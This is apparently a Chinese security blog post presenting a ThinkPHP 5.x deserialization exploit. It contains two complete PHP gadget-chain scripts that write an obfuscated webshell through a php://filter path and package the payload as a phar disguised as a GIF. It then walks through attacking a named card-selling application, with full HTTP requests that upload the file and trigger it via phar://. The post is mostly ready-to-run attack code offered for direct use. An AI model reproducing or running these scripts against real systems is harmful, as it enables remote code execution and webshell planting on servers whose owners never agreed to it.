thinkphp5.x 反序列化

Exp

Php反序列化脚本,直接运行即可

大佬的Exp

<?php

namespace think\process\pipes{

    class Windows{

        private $files = [];

        function __construct($a){

            $this->files=[$a];

        }

    }

}

namespace think{

    abstract class Model{

}

}

namespace think\model{

    use think\Model;

    class Pivot extends Model

    {

        public $parent;

        protected $append = [];

        protected $data = [];

        protected $error;

        function __construct($parent,$error){

            $this->parent=$parent;

            $this->append = ["getError"];

            $this->data =['123'];

            $this->error=(new model\relation\HasOne($error));

        }
    }
}

namespace think\model\relation{

    use think\model\Relation;

    class HasOne extends OneToOne{

        

    }

}

namespace think\mongo{

    class Connection{



    }

}

namespace think\model\relation{

    abstract class OneToOne{

        protected $selfRelation;

        protected $query;

        protected $bindAttr = [];

        function __construct($query){

            $this->selfRelation=0;

            $this->query=$query;

            $this->bindAttr=['dwfeawfwafaaaawwsawwwswssww'];

        }

    }

    }



namespace think\console{

    class Output{

        private $handle = null;

        protected $styles = [

            'getAttr'

        ];

        function __construct($handle){

            $this->handle=$handle;

        }

    }

}

namespace think\session\driver{

    class Memcached{

        protected $handler = null;

        function __construct($handle){

            $this->handler=$handle;

        }

    }

    

}

namespace think\cache\driver

{

    class File{

        protected $options = [

            'expire'        => 3600,

            'cache_subdir'  => false,#encode

            'prefix'        => '',#convert.quoted-printable-decode|convert.quoted-printable-decode|convert.base64-decode/

            'path'          => 'php://filter//convert.iconv.UCS-2LE.UCS-2BE/resource=?<hp pn$ma=e_$EG[Tf"li"e;]f$li=e_$EG[Td"wo"n;]ifelp_tuc_noettn(sn$ma,eifelg_tec_noettn(sf$li)e;)ihhgilhg_tifel_(F_LI_E)_?;a>a

/../',

            'data_compress' => false,

        ];

        protected $tag='123';

    }

}

namespace think\db{

    class Query{

        protected $model;

        function __construct($model){

            $this->model=$model;

        }

    }

}



namespace{

    $File = (new think\cache\driver\File());

    $Memcached = new think\session\driver\Memcached($File);

    $query = new think\db\Query((new think\console\Output($Memcached)));

    $windows=new think\process\pipes\Windows((new think\model\Pivot((new think\console\Output($Memcached)),$query)));

/*    echo iconv('UCS-2LE','UCS-2BE','<?php phpinfo();?>');*/

//    echo iconv('UCS-2LE','UCS-2BE','?<hp phpipfn(o;)>?');

//    $a = new AWS_MODEL;

    $phar = new \Phar("2.phar");

    $phar->startBuffering();

    $phar->setStub("GIF89a"."__HALT_COMPILER();");

    $phar->setMetadata($windows);

    $phar->addFromString("test.txt","123");

    $phar->stopBuffering();

    rename("2.phar","shell.gif");

    echo urlencode(serialize($windows));

}

?>

我的Exp

<?php



namespace think\process\pipes{

	

	class Pipes{

	}



	class Windows extends Pipes{

		private $files;

		public function __construct(){

			$this->files[] = new \think\model\Pivot();

		}

	}

}



namespace think{

	abstract class Model{

	}

}



namespace think\model{

	use think\Model;

	class Pivot extends \think\Model{

		public $parent;

        protected $append = [];

        protected $data = [];

        protected $error;

        function __construct(){

            $this->parent= new \think\console\Output();

            $this->append = ["getError"];

            $this->data =['123'];

            $this->error=(new \think\model\relation\HasOne());

        }

	}

	abstract class Relation{

	}

}



namespace think\model\relation{



	abstract class OneToOne extends \think\model\Relation{



	}

	class HasOne extends OneToOne{

		protected $bindAttr = [];

		protected $query;

		public function __construct(){

			$this->bindAttr = ['a'=>"dwfeawfwafaaaawwsawwwswssww"];

        	$this->query      = new \think\db\Query();

    	}

	}

}



namespace think\db{

	class Query{

		protected $model;

		public function __construct(){

			$this->model = new \think\console\Output();

		}

	}

}



namespace think\console{

	class Output{

		 protected $styles = [

	        'getAttr'

	    ];

	    private $handle;

		public function __construct(){

			$this->handle = new \think\session\driver\Memcached();

		}

	}

}



namespace think\session\driver{

	class Memcached{

		protected $handler;

		public function __construct(){

			$this->handler = new \think\cache\driver\File();

		}

	}

}



namespace think\cache\driver{

	use think\cache\Driver;

	class File extends Driver{

	    protected $options = [

	        'expire'        => 3600,

	        'cache_subdir'  => false,#encode

	        'prefix'        => '',#convert.quoted-printable-decode|convert.quoted-printable-decode|convert.base64-decode/

	        'path'          => 'php://filter//convert.iconv.UCS-2LE.UCS-2BE/resource=?<hp pn$ma=e_$EG[Tf"li"e;]f$li=e_$EG[Td"wo"n;]ifelp_tuc_noettn(sn$ma,eifelg_tec_noettn(sf$li)e;)ihhgilhg_tifel_(F_LI_E)_?;a>a 

/../',

	        'data_compress' => false,

	    ];

	    protected $tag = "123";

	}

}



namespace think\cache{

	class Driver{



	}

}



namespace{

	$a = new \think\process\pipes\Windows(true,100);

	echo urlencode(serialize($a));

    $phar = new \Phar("shell.phar");

    $phar->startBuffering();

    $phar->setStub("GIF89a"."__HALT_COMPILER();");

    $phar->setMetadata($a);

    $phar->addFromString("test.txt","123");

    $phar->stopBuffering();

    #rename("shell.phar","shell.gif");

}



?>

测试Exp

在thinkphp控制器中添加一个方法

使用post传入使用脚本在网页生成的Exp,然后他就会在public文件夹中生成一个webshell

生成的shell名字固定为3b11e4b835d256cc6365eaa91c09a33f.php

 

举例

智宇发卡来举例

运行该php脚本会生成一个shell.gif文件,因为字宇发卡存在任意文件读取漏洞,并且会下载读取的文件

先将刚刚生成的shell.gif上传到服务器中,数据包如下

GET /index.php/wechat/Review/img?url=http://192.168.1.169/shell.gif HTTP/1.1
Host: fakaa.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: see0fb03e=4kjjcl8tlsdit5npjai91k88u3; UM_distinctid=173e1ff4771b8-08d7f410f57e9f-3323765-384000-173e1ff4772af8; CNZZDATA1261189048=306896651-1597222199-%7C1597222199
Connection: close

从Location中得到上传的路径,然后利用phar://协议触发反序列化
phar://static/upload/tmp/d595b3354e6023f7/90a8e6aeb834021a.jpg/test.txt
GET /index.php/wechat/Review/img?url=phar://static/upload/tmp/d595b3354e6023f7/90a8e6aeb834021a.jpg/test.txt HTTP/1.1

Host: fakaa.com

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: see0fb03e=4kjjcl8tlsdit5npjai91k88u3; UM_distinctid=173e1ff4771b8-08d7f410f57e9f-3323765-384000-173e1ff4772af8; CNZZDATA1261189048=306896651-1597222199-%7C1597222199

Connection: close

生成成功